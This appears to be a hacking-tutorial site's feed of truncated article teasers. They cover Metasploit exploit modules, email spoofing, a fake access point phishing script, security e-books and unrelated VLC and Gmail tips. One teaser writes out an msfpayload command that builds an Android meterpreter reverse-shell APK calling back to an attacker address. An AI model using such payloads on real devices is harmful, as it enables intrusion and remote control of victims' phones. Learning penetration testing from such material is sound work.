Hack Remote PC with Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation
This module exploits vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP...
View ArticleHow to Send Encrypted Mail through Gmail (Secure Gmail by Streak)
Secure Gmail encrypts and decrypts emails you send in Gmail. This happens all on your machine, and the unencrypted text never reaches Google servers. This is useful if you don't want anyone but the...
View ArticleHow to Broadcast YouTube Video in Remote System
This module will broadcast a Youtube video on all compromised systems. It will play the video in the target machine's native browser in full screen mode. The VID datastore option is the "v" parameter...
View ArticleHack Remote PC Using Adobe Reader ToolButton Use After Free
This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback...
View ArticleHack Remote PC Using Real Networks RealPlayer Version Attribute Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by improper bounds checking of the version and encoding attributes...
View ArticleHack Remote Windows 7 PC Using IBM Forms Viewer Unicode Buffer Overflow
This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed XFDL files, with a long...
View ArticleEmail spoofing: The story of “Congratulations you have won a lottery” like...
Mail vs E-mailBack in old days when internet was not so common, we had to rely only on the postal/courier services. The only thing that bugs me about the traditional mail is their speed. This is when...
View ArticleRemotely Scan Malware/Virus in Victim PC with Metasploit
This module will check a file for malware on VirusTotal based on the checksum.Exploit TargetsWindows 7Windows XPRequirementAttacker: Kali LinuxVictim PC: Windows 7 Open Kali Linux terminal type...
View ArticlePenetration Testing Procedures & Methodologies
DownloadPassword: www.hackingarticles.in
View ArticleBest of VLC Media Player Tricks (Part 1)
How to Cut the Audio and Video using VLC Player Open the VLC media player. Go to the menu bar .From the View tab, select Advanced Controls.We can see the Record button in the left bottom of the player...
View ArticleHow to Know when people open your email with Google Analytics
Open your Gmail account and compose your message and save in draft Now open this Google sheet and choose the Initialize option under the Email Tracker menuNow you’ll have to authorize the sheet to send...
View ArticleBest of VLC Media Player Tricks (Part 2)
How to Play Multiple Video in VLCOpen the VLC media player.Go to the Tool Tabpresent in the menu bar of the media player, and then select Preferences.Open the Interface Settings then select Allow only...
View ArticleHack Android Phone with Metasploit in Kali Linux
Open Kali Linux Terminal and typemsfpayload android/meterpreter/reverse_tcp lhost=192.168.1.6 lport= 443 R > /root/Desktop/files.apk-p for payloadandroid/meterpreter/reverse_tcpLhost (IP address of...
View ArticleLazyKali -script for Kali Linux
A bash script for when you feel lazy. Adds quite a few tools to Kali Linux.Bleeding Edge ReposAngryIP ScannerTerminatorXchatUnicornscanNautilus Open...
View ArticleHow to Fix Disk Drive and Recover Data from Suddenly Became RAW
When attempting to access the drive in Windows you may see a message asking you to you need to format the disk in Drive E: before you can use itAfter installing it on your computer, choose Complete...
View ArticlePwnSTAR: Pwn SofT Ap scRipt
A bash script to launch a Fake AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing and phishing. It can act as multi-client...
View ArticleHacking with Kali: Practical Penetration Testing Techniques
DownloadPassword: www.hackingarticles.in
View ArticleCyber Warfare: Techniques, Tactics and Tools for Security Practitioners...
Downloadpassword is www.hackingarticles.in
View Article